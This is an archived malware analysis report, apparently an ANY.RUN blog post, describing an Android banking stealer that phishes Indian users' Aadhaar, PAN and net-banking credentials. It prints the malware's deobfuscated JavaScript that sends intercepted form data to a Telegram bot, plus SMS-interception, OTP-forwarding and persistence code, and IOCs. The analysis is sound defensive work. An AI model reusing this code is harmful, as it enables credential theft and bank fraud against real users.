{
	"id": "0163b4dc-d7c3-4196-bb76-f53d19cbe8f4",
	"created_at": "2026-04-06T00:17:42.182956Z",
	"updated_at": "2026-04-10T03:21:29.711896Z",
	"deleted_at": null,
	"sha1_hash": "dc83e3e6c01d73c0459f2f225ffe78fb82150b24",
	"title": "Salvador Stealer: Analysis of New Mobile Banking Malware",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 516507,
	"plain_text": "Salvador Stealer: Analysis of New Mobile Banking Malware\r\nBy Achmad Adhikara\r\nArchived: 2026-04-05 16:47:30 UTC\r\nIn this report, we examine an Android malware sample recently collected and analyzed by our team. This malware\r\nmasquerades as a banking application and is built to steal sensitive user information. During the analysis, we came\r\nacross internal references to “Salvador,” so we decided to name it Salvador Stealer. \r\nReal-time visibility into mobile malware behavior is crucial for security teams, SOC analysts, and mobile app\r\nproviders. This analysis demonstrates how advanced threats can bypass user trust and steal sensitive data,\r\nhighlighting the need for dynamic malware analysis solutions. \r\nSalvador Stealer Overview \r\nThe collected malware sample is a dropper that delivers a banking stealer masquerading as a legitimate banking\r\napp. Its primary goal is to collect sensitive user information, including: \r\nRegistered mobile number \r\nAadhaar number \r\nPAN card details \r\nDate of birth \r\nNet banking user ID and password \r\nIt embeds a phishing website inside the Android application to trick users into entering their credentials. Once\r\nsubmitted, the stolen data is immediately sent to both the phishing site and a C2 server controlled via Telegram. \r\nIn this technical breakdown, we’ll walk you through how this malware operates, how it maintains persistence, and\r\nhow it exfiltrates sensitive data in real time. \r\nKey Takeaways \r\nMulti-Stage Attack Chain: Salvador Stealer uses a two-stage infection process — a dropper APK that\r\ninstalls and launches the actual banking stealer payload. \r\nPhishing-Based Credential Theft: The malware embeds a phishing website within the Android app to\r\ncollect sensitive personal and banking information, including Aadhaar number, PAN card, and net banking\r\ncredentials. 
\r\nReal-Time Data Exfiltration: Stolen credentials are immediately sent to both a phishing server and a\r\nCommand and Control (C2) server via Telegram Bot API. \r\nhttps://any.run/cybersecurity-blog/salvador-stealer-malware-analysis/\r\nPage 1 of 22\n\nSMS Interception \u0026 OTP Theft: Salvador Stealer abuses SMS permissions to capture incoming OTPs\r\nand banking verification codes, helping attackers bypass two-factor authentication. \r\nMultiple Exfiltration Channels: The malware forwards stolen SMS data via dynamic SMS forwarding\r\nand HTTP POST requests, ensuring data reaches the attacker even if one channel fails. \r\nPersistence Mechanisms: Salvador Stealer automatically restarts itself if stopped and survives device\r\nreboots by registering system-level broadcast receivers. \r\nExposed Infrastructure: During analysis, we found the phishing infrastructure and admin panel publicly\r\naccessible, exposing an attacker’s WhatsApp contact, suggesting a possible link to India. \r\nMalware Behavior Analysis \r\nTo uncover the full behavior of Salvador Stealer and observe its actions in real time, we executed the sample\r\ninside ANY.RUN’s new Android sandbox.\r\nAnalysis of the Salvador malware inside ANY.RUN Sandbox’s interactive Android VM\r\nThis interactive environment allowed us to quickly analyze the malware’s behavior, visualize its activity, and\r\nidentify key indicators, all while saving significant analysis time. \r\nMalware Structure \r\nThe malware consists of two key components: \r\nDropper APK – Installs and triggers the second-stage payload. \r\nBase.apk (Payload) – The actual banking credential stealer responsible for data theft. \r\nDropper APK Behavior\nThe dropper APK is designed to silently install and execute the malicious payload. 
To enable this, it declares\nspecific permissions and intent filters in its AndroidManifest.xml, including:\nAndroidManifest.xml\nAnd\n\nBase.apk displayed inside the initial dropper APK using WinRAR\r\nOnce executed, base.apk exhibits several key behaviors: \r\nIt establishes a connection to Telegram, which the attackers use as a Command and Control (C2) server to\r\nreceive stolen data and manage the infection. \r\nIt triggers the signature “Starts itself from another location,” confirming that it was dropped and\r\nlaunched by the initial dropper APK rather than being installed directly. \r\nProcess communicating with Telegram revealed inside ANY.RUN Android sandbox\r\nPhishing Interface \u0026 Data Theft \r\nThe Salvador Stealer tricks users into entering their banking credentials through a phishing page, styled as a\r\nbanking interface, that is embedded in the app. \r\nOnce the user submits their credentials, the data is immediately sent to both the C2 server and a Telegram bot. \r\nStep 1: Collecting Personal Information\r\nOn the first page, the app prompts the user to enter: \r\nRegistered mobile number \r\nAadhaar number \r\nPAN card details \r\nDate of birth \r\nThe interface of the fake banking app displayed inside ANY.RUN Android sandbox \r\nOnce this information is submitted, it is immediately sent to: \r\nA phishing website controlled by the attacker \r\nStolen data sent to phishing site \r\nA Telegram bot used as part of the malware’s C2 infrastructure \r\nStolen data sent to Telegram C2 server \r\nStep 2: Stealing Banking Credentials \r\nOn the next stage, the app asks the user to provide: \r\nNet banking user ID \r\nPassword \r\nBanking credentials provided to cyber attackers \r\nThis data is also 
exfiltrated to both the phishing server and the Telegram bot. We can see this easily inside\r\nANY.RUN Android sandbox: \r\nStolen data sent to phishing site\r\nThese credential theft attempts were clearly captured in the HTTP request logs during sandbox analysis.\r\nStolen data sent to Telegram C2 server\r\nBy enabling HTTPS MITM Proxy mode in ANY.RUN’s Android sandbox, we were able to intercept and verify\r\nthe exfiltration of user data in real time. \r\nCredential theft attempts captured in the HTTP request logs\r\nTechnical Analysis \r\nThe base.apk file embedded in the dropper APK contains the core malicious functionality of Salvador\r\nStealer. Here’s a detailed look at its structure: \r\nBase.apk file structure\r\nEncrypted Strings \u0026 Obfuscation \r\nWe’ll begin by opening one of the Java files to analyze its contents. Let’s start with Earnestine.java.\r\npublic class Earnestine extends BroadcastReceiver {\r\n    private static final Map\u003cString, StringBuilder\u003e sdghedy = new ConcurrentHashMap();\r\n\r\n    @Override // android.content.BroadcastReceiver\r\n    public void onReceive(Context context, Intent intent) {\r\n        Object[] pdus;\r\n        if (intent.getAction().equals(NPStringFog.decode(\"0F1E09130108034B021C1F1B080A04154B260B1C0811060E091C5C\r\n        for (Object pdu : pdus) {\r\n... \r\nWe can see that the strings are encrypted using a custom method. The decryption is performed using\r\nNPStringFog.decode(…), defined in the NPStringFog.java class. \r\nLet’s examine that next to understand what type of encryption is used. \r\nOpening NPStringFog.java, we can confirm that it implements XOR decryption using a static key: “npmanager”. 
\r\npackage obfuse;\r\n\r\nimport java.io.ByteArrayOutputStream;\r\n\r\npublic class NPStringFog {\r\n    public static String KEY = \"npmanager\"; // XOR key\r\n    private static final String hexString = \"0123456789ABCDEF\"; // Hexadecimal string for conversion\r\n\r\n    public static String decode(String str) {\r\n        ByteArrayOutputStream baos = new ByteArrayOutputStream(str.length() / 2);\r\n\r\n        // Convert hex string to byte array\r\n        for (int i = 0; i \u003c str.length(); i += 2) {\r\n            baos.write((hexString.indexOf(str.charAt(i)) \u003c\u003c 4) | hexString.indexOf(str.charAt(i + 1)));\r\n        }\r\n\r\n        byte[] b = baos.toByteArray();\r\n        int len = b.length;\r\n        int keyLen = KEY.length();\r\n\r\n        // XOR decryption\r\n        for (int i2 = 0; i2 \u003c len; i2++) {\r\n            b[i2] = (byte) (b[i2] ^ KEY.charAt(i2 % keyLen)); // XOR byte with key\r\n        }\r\n\r\n        return new String(b);\r\n    }\r\n}\r\nThis confirms that the encryption is XOR-based. Using CyberChef, we can manually decode strings like the one\r\nfound in Earnestine: \r\nDecoding strings with the help of CyberChef \r\nCyberChef recipe:\r\nhttps%3A%2F%2Fgchq.github.io%2FCyberChef%2F%23recipe%3DFrom_Hex%28%27Auto%27%29XOR%28%257B%27option%27%3A%27Lat\r\nTo analyze the rest of the APK effectively, we’ll need to decode all encrypted strings automatically. 
Here’s a\r\nPython script that recursively scans all .java files, decrypts any encrypted strings using the same XOR method,\r\nand writes the result to a _decoded.java file.\r\nimport re\r\nimport os\r\n\r\ndef decode_npstringfog(encoded: str, key: str = \"npmanager\") -\u003e str:\r\n    b = bytearray()\r\n    for i in range(0, len(encoded), 2):\r\n        b.append(int(encoded[i:i+2], 16))\r\n    key_bytes = key.encode()\r\n    return bytearray((b[i] ^ key_bytes[i % len(key_bytes)]) for i in range(len(b))).decode(errors=\"replace\")\r\n\r\ndef decode_and_save(filepath: str):\r\n    with open(filepath, \"r\", encoding=\"utf-8\") as f:\r\n        content = f.read()\r\n\r\n    # Find all NPStringFog.decode(\"...\")\r\n    pattern = re.compile(r'NPStringFog\\.decode\\(\"([0-9A-F]+)\"\\)')\r\n    if not pattern.search(content):\r\n        return\r\n\r\n    decoded_content = pattern.sub(lambda m: f'\"{decode_npstringfog(m.group(1))}\"', content)\r\n\r\n    outpath = filepath.replace(\".java\", \"_decoded.java\")\r\n    with open(outpath, \"w\", encoding=\"utf-8\") as f:\r\n        f.write(decoded_content)\r\n    print(f\"[+] Decoded file written: {outpath}\")\r\n\r\ndef walk_and_decode(base_dir: str = \".\"):\r\n    for root, _, files in os.walk(base_dir):\r\n        for file in files:\r\n            if file.endswith(\".java\"):\r\n                full_path = os.path.join(root, file)\r\n                decode_and_save(full_path)\r\n\r\nwalk_and_decode()\r\nWebView-Based Phishing Page \r\nNow that we’ve decoded the files, we can begin our deeper analysis of base.apk. \r\nLet’s start with Helene.java, which acts as the main activity of the application. It loads a webpage and handles\r\nruntime permissions. \r\nUpon launch, it checks for the necessary Android permissions and ensures there is an active internet connection. 
\r\n@Override\r\npublic void onCreate(Bundle savedInstanceState) {\r\n    super.onCreate(savedInstanceState);\r\n    setContentView(R.layout.activity_ffff);\r\n    changeStatusBarColor(\"#4CAF50\");\r\n    ...\r\n    if (checkPermissions(this)) {\r\n        WebView webView = (WebView) findViewById(R.id.randomWebView);\r\n        setupWebView(this, webView);\r\n        initiateForegroundServiceIfRequired();\r\n    } else {\r\n        requestAppPermissions();\r\n    }\r\n}\r\nThis method sets up the UI, verifies permissions, and initializes a WebView. The setupWebView() method enables\r\nJavaScript and DOM storage, then loads the phishing page:\r\npublic void setupWebView(Context context, final WebView webView) {\r\n    WebSettings settings = webView.getSettings();\r\n    settings.setJavaScriptEnabled(true);\r\n    settings.setDomStorageEnabled(true);\r\n    ...\r\n    webView.loadUrl(\"https://t15.muletipushpa.cloud/page/\");\r\n}\r\nOnce the page finishes loading, a malicious JavaScript payload is injected: \r\nString jsCode = \"eval(decodeURIComponent('%28%66%75%6e%63%74%69.....'));\";\r\nAfter decoding, the JavaScript reveals that it hooks into XMLHttpRequest.prototype.send, which is commonly\r\nused by web apps to send data (e.g., login credentials or session info). 
\r\n(function() {\r\n    const originalSend = XMLHttpRequest.prototype.send;\r\n    XMLHttpRequest.prototype.send = function(data) {\r\n        try {\r\n            const botToken = \"7931012454:AAGdsBp3w5fSE9PxdrwNUopr3SU86mFQieE\";\r\n            const chatId = \"-1002480016557\";\r\n            const telegramUrl = `https://api.telegram.org/bot${botToken}/sendMessage`;\r\n            const telegramMessage = {\r\n                chat_id: chatId,\r\n                text: `Intercepted Data Sent:\\n${data}`\r\n            };\r\n            fetch(telegramUrl, {\r\n                method: 'POST',\r\n                headers: {\r\n                    'Content-Type': 'application/json'\r\n                },\r\n                body: JSON.stringify(telegramMessage)\r\n            });\r\n        } catch (e) {\r\n            console.error(\"Error sending to Telegram:\", e);\r\n        }\r\n        return originalSend.apply(this, arguments);\r\n    };\r\n})();\r\nIt intercepts all AJAX/XHR requests made from the loaded phishing page. These intercepted payloads are sent to a\r\nhardcoded Telegram chat via the Bot API. \r\nSMS Interception \u0026 OTP Theft \r\nAfter loading the phishing WebView, the app requests several Android permissions, including: \r\nRECEIVE_SMS \r\nSEND_SMS \r\nREAD_SMS \r\nINTERNET \r\nThese permissions are essential for the malware’s goals—intercepting one-time passwords (OTPs) and forwarding\r\nthem. \r\nOnce the permissions are granted, the initiateForegroundServiceIfRequired() method is called, launching the\r\nFitzgerald service. 
\r\nThis foreground service creates a fake notification (“Customer support”) and, more importantly, immediately\r\nregisters a broadcast receiver to intercept incoming SMS: \r\nthis.smsReceiver = new Earnestine();\r\nregisterReceiver(this.smsReceiver, new IntentFilter(\"android.provider.Telephony.SMS_RECEIVED\"));\r\nThis is the real starting point of the OTP interception process. Every incoming message is captured and parsed by\r\nEarnestine. From the PDU, the malware extracts the message body, sender’s number, and timestamp: \r\nSmsMessage sms = SmsMessage.createFromPdu((byte[]) pdu, \"3gpp\");\r\nString messageBody = sms.getMessageBody();\r\nString senderId = sms.getOriginatingAddress();\r\nlong timestamp = sms.getTimestampMillis();\r\nData Exfiltration Methods\r\nThe message is then stored using a map that groups multipart SMS messages together. Once it decides the\r\nmessage is complete and ready for exfiltration, the malware uses two separate mechanisms to forward it to the\r\nattacker: \r\n1. Dynamic SMS forwarding: \r\nInside a function named Bradford(), the malware contacts a remote server to retrieve a forwarding number. \r\nString urlString = \"https://t15.muletipushpa.cloud/json/number.php\";\r\n...\r\nString phoneNumber = jsonObject.optString(\"number\", \"\");\r\nEarnestine.this.sendSMS(messageBody, phoneNumber);\r\nThis number is set by the attacker and can be changed at any time. If the server responds with enabled: true, the\r\nmessage is forwarded to that number using the standard SmsManager. \r\nsmsManager.sendTextMessage(phoneNumber, null, messageBody, null, null);\r\nIf the number is not available or the response is malformed, the malware will fall back to a previously saved one\r\nstored in SharedPreferences. It uses “Salvador” as the name of the preference file, and\r\n“forwardingNumber” as the key to retrieve the last known destination. 
\r\nThis use of “Salvador” as a unique identifier for internal storage is what led us to name this malware Salvador\r\nStealer: \r\nSharedPreferences sharedPreferences = context.getSharedPreferences(\"Salvador\", 0);\r\nString savedPhoneNumber = sharedPreferences.getString(\"forwardingNumber\", \"\");\r\nThis suggests the malware is designed to persist attacker-supplied configuration data between sessions, allowing it\r\nto continue exfiltrating OTPs even when the server is unreachable or temporarily offline. \r\n2. HTTP-Based Fallback \r\nThrough another method called Randall(), the malware constructs a JSON payload containing the sender ID,\r\nmessage content, and timestamp: \r\njsonData.put(\"sender_id\", senderId);\r\njsonData.put(\"message\", messageBody);\r\njsonData.put(\"timestamp\", timestamp);\r\nThis data is then sent in a POST request to another hardcoded endpoint: \r\nString apiUrl = \"https://t15.muletipushpa.cloud/post.php\";\r\nBy using both SMS and HTTP as parallel delivery channels, the malware increases its chances of reliably\r\ndelivering OTPs or any sensitive codes it intercepts, ensuring the attacker receives them regardless of connectivity\r\nissues or SMS blocking. \r\nPersistence Mechanism \r\nEven if the user or system tries to terminate the app’s background service, the malware is programmed to\r\nautomatically restart it. When the Fitzgerald service is killed or swiped away, it immediately schedules a recovery\r\ntask using Android’s WorkManager: \r\nWorkRequest serviceRestartWork = new OneTimeWorkRequest.Builder(Mauricio.class)\r\n    .setInitialDelay(1L, TimeUnit.SECONDS)\r\n    .build();\r\nWorkManager.getInstance(getApplicationContext()).enqueue(serviceRestartWork);\r\nThe scheduled worker points to the Mauricio class. 
Inside, it simply relaunches Fitzgerald: \r\nIntent Pasquale = new Intent(getApplicationContext(), Fitzgerald.class);\r\ngetApplicationContext().startForegroundService(Pasquale);\r\nThis way, even if the user tries to shut the app down from the task manager or system settings, the malware\r\nsilently revives itself within seconds. \r\nIf the device itself is rebooted, the malware still survives. A separate class named Ellsworth is responsible for this\r\nbehavior. It listens for the system-wide BOOT_COMPLETED broadcast and triggers the Fitzgerald service again: \r\npublic class Ellsworth extends BroadcastReceiver {\r\n    @Override\r\n    public void onReceive(Context context, Intent intent) {\r\n        if (intent.getAction().equals(\"android.intent.action.BOOT_COMPLETED\")) {\r\n            Intent serviceIntent = new Intent(context, (Class\u003c?\u003e) Fitzgerald.class);\r\n            context.startService(serviceIntent);\r\n        }\r\n    }\r\n}\r\nThis guarantees that the malware regains control after reboot and resumes intercepting SMS messages\r\nimmediately. \r\nInteresting Findings \r\nDuring our analysis, we identified that the fake banking interface used by Salvador Stealer is actually a phishing\r\nwebsite embedded inside the Android application. \r\nThe phishing page can be accessed directly at: \r\n👉 hxxxs://t15[.]muletipushpa[.]cloud/page/start[.]php \r\nPhishing page that encourages victims to share their personal data \r\nWe also detected another phishing page hosted on a different subdomain, following a pattern with incremental\r\ndigits—from t01.* up to t15.* \r\nAt the time of writing, the attacker has also left the admin panel accessible to anyone. 
\r\nThe admin login page is publicly available at: \r\n👉 hxxxs://t15[.]muletipushpa[.]cloud/admin/login[.]php \r\nAdmin login page available to everyone \r\nBrute-forcing the admin login panel reveals a message prompting the user to contact a WhatsApp number, likely\r\nbelonging to the developer of this phishing malware. \r\nhxxxs://api[.]whatsapp[.]com/send/?phone=916306285085\u0026text\u0026type=phone_number\u0026app_absent=0\r\nExposed phone number: +916306285085 \r\nThis suggests that the attacker is either based in India or using an Indian phone number as a disguise. \r\nSalvador Threat Impact \r\nThe Salvador Stealer campaign poses a serious risk to both individuals and organizations: \r\nFor end users: Victims risk financial fraud, identity theft, and unauthorized access to their banking\r\naccounts. \r\nFor financial institutions: This malware undermines customer trust, increases fraud cases, and may lead\r\nto reputational damage. \r\nFor security teams: Salvador Stealer’s layered infection chain, real-time data exfiltration, and SMS\r\ninterception tactics make detection difficult without advanced analysis tools. \r\nFor the mobile ecosystem: The use of legitimate-looking banking apps and embedded phishing pages\r\nhighlights the growing trend of sophisticated Android-based social engineering attacks. \r\nConclusion \r\nThe analysis of Salvador Stealer reveals how modern Android malware combines phishing, credential theft, and\r\nadvanced persistence techniques to compromise sensitive financial data. Threats like this highlight the increasing\r\ncomplexity of mobile malware and the growing challenge of detecting and stopping them before damage is done. 
\r\nBy analyzing Salvador Stealer in real time using ANY.RUN’s Android sandbox, we were able to fully map its\r\nbehavior, uncover its infrastructure, and extract key indicators in just minutes—something that would otherwise\r\nrequire hours of manual static analysis. \r\nHere’s how analysis like this can bring value: \r\nFaster threat detection: Quickly identify malicious behaviors and communication patterns. \r\nComplete visibility: Observe real-time actions of mobile malware, including data exfiltration and\r\npersistence tactics. \r\nReduced investigation time: Automate and accelerate the technical analysis process. \r\nImproved response: Provide clear, actionable Indicators of Compromise (IOCs) for threat hunting and\r\nincident response. \r\nEnhanced threat intelligence: Expose attacker infrastructure and techniques that may be used in future\r\ncampaigns. \r\nEffective defense starts with better visibility. Tools like ANY.RUN’s sandbox make real-time threat analysis\r\nactionable and accessible to everyone. 
\r\nIndicators of Compromise (IOC) \r\n🔗 Phishing URLs: \r\nt01[.]muletipushpa[.]cloud \r\nt02[.]muletipushpa[.]cloud \r\nt03[.]muletipushpa[.]cloud \r\nt04[.]muletipushpa[.]cloud \r\nt05[.]muletipushpa[.]cloud \r\nt06[.]muletipushpa[.]cloud \r\nt08[.]muletipushpa[.]cloud \r\nt10[.]muletipushpa[.]cloud \r\nt11[.]muletipushpa[.]cloud \r\nt12[.]muletipushpa[.]cloud \r\nt13[.]muletipushpa[.]cloud \r\nt14[.]muletipushpa[.]cloud \r\nt15[.]muletipushpa[.]cloud \r\nta01[.]muletipushpa[.]cloud \r\n📡 C2 Server (Telegram Bot): \r\nhxxs://api[.]telegram[.]org/bot7931012454:AAGdsBp3w5fSE9PxdrwNUopr3SU86mFQieE \r\n🔍 File Hashes: \r\nINDUSLND_BANK_E_KYC.apk \r\nSHA256: 21504D3F2F3C8D8D231575CA25B4E7E0871AD36CA6BBB825BF7F12BFC3B00F5A \r\nBase.apk \r\nSHA256: 7950CC61688A5BDDBCE3CB8E7CD6BEC47EEE9E38DA3210098F5A5C20B39FB6D8 \r\nThreat actor’s phone number: \r\n+916306285085 \r\nAbout ANY.RUN\r\nANY.RUN helps more than 500,000 cybersecurity professionals worldwide. Our interactive sandbox simplifies\r\nmalware analysis of threats that target both Windows and Linux systems. Our threat intelligence products, TI\r\nLookup, YARA Search, and Feeds, help you find IOCs or files to learn more about the threats and respond to\r\nincidents faster.\r\nAchmad Adhikara\r\nThreat Hunter at ANY.RUN\r\nAchmad Adhikara is a threat hunter at ANY.RUN. Former red teamer. I chase threats. I prefer to stay below\r\nperiscope depth. fnord.\r\nSource: https://any.run/cybersecurity-blog/salvador-stealer-malware-analysis/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://any.run/cybersecurity-blog/salvador-stealer-malware-analysis/"
	],
	"report_names": [
		"salvador-stealer-malware-analysis"
	],
	"threat_actors": [],
	"ts_created_at": 1775434662,
	"ts_updated_at": 1775791289,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/dc83e3e6c01d73c0459f2f225ffe78fb82150b24.pdf",
		"text": "https://archive.orkl.eu/dc83e3e6c01d73c0459f2f225ffe78fb82150b24.txt",
		"img": "https://archive.orkl.eu/dc83e3e6c01d73c0459f2f225ffe78fb82150b24.jpg"
	}
}